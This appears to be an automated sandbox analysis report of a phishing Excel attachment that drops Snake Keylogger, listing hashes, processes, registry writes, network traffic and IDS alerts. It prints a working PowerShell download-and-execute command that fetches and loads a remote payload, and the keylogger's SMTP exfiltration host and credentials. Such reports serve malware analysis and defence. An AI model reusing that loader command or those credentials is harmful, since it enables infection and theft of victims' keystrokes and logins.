File name: | Solicitud de cotizaciòn..xlsx |
Full analysis: | https://app.any.run/tasks/440d4e74-553a-4531-8451-f7f6bda138f4 |
Verdict: | Malicious activity |
Threats: | A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools. |
Analysis date: | December 05, 2022, 19:04:52 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
File info: | Microsoft Excel 2007+ |
MD5: | CD9567E232B722B34985981E32633321 |
SHA1: | 3B1FDB9DACD8A1F20FDC0F03D2088855924452A7 |
SHA256: | 7AE8B3795F2EFFF6E153B1290633C327A5D3ADE19F40ECC0A891579ED5587C61 |
SSDEEP: | 24576:Cmv7PSn7ViMIY4oSX6fM1lPH/VE+njnkLQp:CmMVHfSlPHJngEp |
.xlsx | | | Excel Microsoft Office Open XML Format document (61.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (31.5) |
.zip | | | ZIP compressed archive (7.2) |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2424 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | Explorer.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.4756.1000 Modules
| |||||||||||||||
2748 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | ||||||||||||
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 Modules
| |||||||||||||||
2324 | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} | C:\Windows\system32\DllHost.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: COM Surrogate Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3044 | C:\Windows\System32\powercfg.exe -energy -auto | C:\Windows\System32\powercfg.exe | — | services.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Power Settings Command-Line Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
872 | C:\Windows\system32\svchost.exe -k DcomLaunch | C:\Windows\system32\svchost.exe | services.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1736 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\greeee.vbs" | C:\Windows\SysWOW64\WScript.exe | — | EQNEDT32.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
2908 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://4.204.233.44/DLL/NoStartUp.ppam'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.sdkgajsasjkkgjsfddvfsdvn/42.021.871.591//:ptth')) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
764 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft .NET Assembly Registration Utility Exit code: 4294967295 Version: 4.7.2558.0 built by: NET471REL1 Modules
| |||||||||||||||
2316 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft .NET Assembly Registration Utility Version: 4.7.2558.0 built by: NET471REL1 Modules
SnakeKeylogger(PID) Process(2316) RegAsm.exe ProtocolSMTP Hostkeefort.com.ec Port587 Credentials Username[email protected] Passwordcousinsnake@@ | |||||||||||||||
2332 | C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation | C:\Windows\system32\rundll32.exe | — | services.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (2424) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | write | Name: | |k: |
Value: 7C6B3A0078090000010000000000000000000000 | |||
(PID) Process: | (2424) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2424) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1041 |
Value: Off | |||
(PID) Process: | (2424) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1042 |
Value: Off | |||
(PID) Process: | (2424) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1046 |
Value: Off | |||
(PID) Process: | (2424) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1036 |
Value: Off | |||
(PID) Process: | (2424) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1031 |
Value: Off | |||
(PID) Process: | (2424) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1040 |
Value: Off | |||
(PID) Process: | (2424) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1049 |
Value: Off | |||
(PID) Process: | (2424) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 3082 |
Value: Off |
PID | Process | Filename | Type | |
---|---|---|---|---|
2424 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE37C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2324 | DllHost.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat | — | |
MD5:— | SHA256:— | |||
3044 | powercfg.exe | C:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics\energy-ntkl.etl | — | |
MD5:— | SHA256:— | |||
496 | svchost.exe | C:\Windows\appcompat\programs\RecentFileCache.bcf | txt | |
MD5:DB919CBFD8209C206725ED7BD8244D8C | SHA256:9ACD346C89EBA0B7497A768523DA4C2EC2818E169A460A5DB0742D43A4C51F89 | |||
2324 | DllHost.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\WebCache\V01.log | binary | |
MD5:5E3C6B74D1FD73C5D74C3871945A55DB | SHA256:B6CB57DE1A5EBF078CFCD4EBC2630DB260D2F2A377D0AEA280B603DC0E8A8CF9 | |||
2976 | mcbuilder.exe | C:\Windows\rescache\wip\Segment0.cmf | binary | |
MD5:68B35CF25AE98FD9B310DF7132450024 | SHA256:62F5CF8173B64216ACF11ACC1F291FCDFBE25FFEBD5B83FDA80DD516D0DDA527 | |||
3044 | powercfg.exe | C:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics\energy-report.html | html | |
MD5:65EDAA311B3506A8F8192A17C2705B0C | SHA256:92B325BA150153152DE3F1AC56C2F8E0B57C0656BE429211596360427FB9B52C | |||
2332 | rundll32.exe | C:\System Volume Information\SPP\metadata-2 | — | |
MD5:— | SHA256:— | |||
2976 | mcbuilder.exe | C:\Windows\rescache\wip\ResCache.hit | binary | |
MD5:62E6BAB699C953298F691D554E07E1CB | SHA256:04CD989148636E47ECFA650ED12EE1DABDFF74BFAD44256C0D103C66DE35646A | |||
2748 | EQNEDT32.EXE | C:\Users\admin\AppData\Roaming\greeee.vbs | text | |
MD5:AB3FE7A67DDD142A9BAA136EF4125704 | SHA256:84A64183C0D06A0A6AC7D9B431E843F74BEAC457F5561D12D58B349AE6F9035C |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2908 | powershell.exe | GET | 200 | 195.178.120.24:80 | http://195.178.120.24/nvdsfvddfsjgkkjsasjagkds.txt | unknown | text | 168 Kb | malicious |
2908 | powershell.exe | GET | 200 | 4.204.233.44:80 | http://4.204.233.44/DLL/NoStartUp.ppam | US | text | 12.0 Kb | malicious |
2316 | RegAsm.exe | GET | 200 | 158.101.44.242:80 | http://checkip.dyndns.org/ | US | html | 104 b | shared |
2908 | powershell.exe | GET | 200 | 4.204.233.44:80 | http://4.204.233.44/Rump/Rump.xls | US | text | 53.1 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2748 | EQNEDT32.EXE | 142.250.185.202:443 | firebasestorage.googleapis.com | GOOGLE | US | whitelisted |
2908 | powershell.exe | 195.178.120.24:80 | — | Delis LLC | US | malicious |
2908 | powershell.exe | 4.204.233.44:80 | — | MICROSOFT-CORP-MSN-AS-BLOCK | US | malicious |
2316 | RegAsm.exe | 88.99.90.21:587 | keefort.com.ec | Hetzner Online GmbH | DE | malicious |
2316 | RegAsm.exe | 158.101.44.242:80 | checkip.dyndns.org | ORACLE-BMC-31898 | US | malicious |
Domain | IP | Reputation |
---|---|---|
firebasestorage.googleapis.com |
| whitelisted |
checkip.dyndns.org |
| shared |
keefort.com.ec |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2908 | powershell.exe | A Network Trojan was detected | ET TROJAN Powershell commands sent B64 2 |
2908 | powershell.exe | Misc activity | ET POLICY EXE Base64 Encoded potential malware |
2908 | powershell.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host XLS Request |
2908 | powershell.exe | Potentially Bad Traffic | ET INFO Terse Request for .txt - Likely Hostile |
2908 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.dyndns. Domain |
— | — | Misc activity | AV INFO Query to checkip.dyndns. Domain |
2316 | RegAsm.exe | Potential Corporate Privacy Violation | ET POLICY External IP Lookup - checkip.dyndns.org |
2316 | RegAsm.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |